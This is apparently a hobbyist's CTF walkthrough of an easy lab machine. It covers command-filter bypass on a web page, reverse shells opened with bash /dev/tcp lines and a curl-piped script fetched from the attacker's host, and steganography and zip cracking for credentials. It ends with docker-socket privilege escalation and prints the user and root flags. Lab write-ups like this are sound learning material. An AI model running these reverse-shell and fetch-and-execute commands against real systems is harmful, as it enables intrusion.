Easy level CTF. Capture the flags and have fun!
Enumeration shows an open FTP, SSH and Apache - pretty standard stuff.
Looks like we have anonymous FTP access. with a note in the root.
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
Let's peek at the website. Looks pretty nice.
The only thing of note in the source code is
<!--made by vipul mirajkar thevipulm.appspot.com-->
That takes us to his site that shows us he likes Java - spring in particular... do i smell a spring4shell? While I was poking around I ran a gobuster who found this (is it weird I define my tools as entities?)
Nothing super obvious in the images folder but the secret folder gives us some command tools
If we try some easy commands like ls ../../../ it picks up us doing something naughty
BUT if we do a simple command like pwd it's fine
It's also fine if we do a ping command. So playing around I see we can use the dir command and traverse some directories. With a little research we can write out the files with od... well sorta.
Doing a quick peek a the writeup I see we can escape with backslashes so let's play with that a bit. I know that "dir ../../../../" will get me to the root and after playing, I see I have access to Apar's user account, which has a local.txt file in it.
weirdly the escape characters don't show the contents of the file... okay so peeking at the writeup again it looks like when we \cat out the index.php file we can see the filters... dang. Missed that.
Well i see nc is filtered but not the elongated netcat. When I played with that, I got a "shell" but it sucked - no echo out.
BUT when I killed the session... all the text I typed showed up... so let's try something. I tried to just use 'cat ../../../../apaar/local.txt' but that didn't work - looks like it's only echoing my commands, not the return from those commands.
Well, I hate to do this but I think I"m going to have to follow the writeup a bit - cause I don't know what's going on. I've created a shell script with this in it (on my local box):
bash -c "bash -i >& /dev/tcp/10.10.237.144/1234 0>&1"$
Then I hosted it on a python web server. I created a nc listener on my local box and then ran this on the website
curl 10.8.2.58:8000/shell.sh | ba\sh
That gave me a shell, but again without any echo. Doing a ctrl-Z and running stty raw -echo; fg doesn't seem to fix the issue either.
Okay so annoying but reading through some of the other writeups, it looks like you can just use the full path... and this command got me a stable shell:
/bin/bash -c '/bin/bash >& /dev/tcp/10.6.101.7/4444 0>&1'
Once we get a shell we realize we STILL don't have access to the user file we need so let's see what we can do. sudo -l tells us we can run this script.
In order to run this app it says we need tty present and to specify an askpass. It looks like tty is used to identify a terminal through which a file descriptor to access its standard input (/dev/ttys001) and askpass refers to a program that should be used to prompt a user for credentials (ssh-askpass). Getting this error is because sudo needs to prompt for a password but doesn't have access to a tty prompt to prompt for the password.
We don't HAVE a password so running that's not even going to be helpful anyway, let's move on. Let's upgrade our shell:
Give us a better featured bash shell:
python -c 'import pty;pty.spawn("/bin/bash")'
Give us term commands like clear:
export TERM=xterm
Give us access to auto-completes and Ctrl+c by pressing Ctrl + Z. Then back in our own terminal and type
stty raw -echo; fg
I was going to get linpeas on this but I can't find anywhere where I have write permission... poking around the file system a bit, there's a folder called files and the file index.php has a database password
The file hacker.php gives us this clue
We setup a python web server on this shell and use it to host the pictures in the images directory. We download those images and even though binwalk doesn't say there's anything in 'em - I learned a valuable lesson: just give steghide a try!
steghide extract -sf hacker-with-laptop_23-2147985341.jpg
This gives us a zip file that's been password protected. We have to use zip2john to get the hash and crack it. What we get is some source code - inside this source code we see an encrypted password that's listed as base64.
We decode this with a free base64 decoder we found online. We get this:
!d0ntKn0wmYp@ssw0rd
interesting. Further on down that same file we got, we see a welcome text for Anurodh - so we know who this is for. Looks like this is the ssh login information!
Okay so this next part is a bit messed up. I started out with linpeas to show me what was available. There was a docker socket that had a known CVE and I was able to find instructions here: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-docker-socket
Where it gets messy is that I wasn't able to get it to run - but then gettin some hints from one of the writeups - I changed the docker image to one that was local and it magically dropped me into root!
From what I can gather docker is an OS-level virtualization software that lets you run stuff in "containers" The command below breaks down like this:
-H - the local docker socket (that we have write access to)
run - runs a command in a new container
-v bind mount a volume of /:/host
-it - Keep STDIN open even if not attached and allocates pseudo tty
ubuntu - assuming this is the docker image we want to use (which fails and we change to alpine)
chroot - changes the root directory to /host
/bin/bash - the main process we want to run
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}
Comments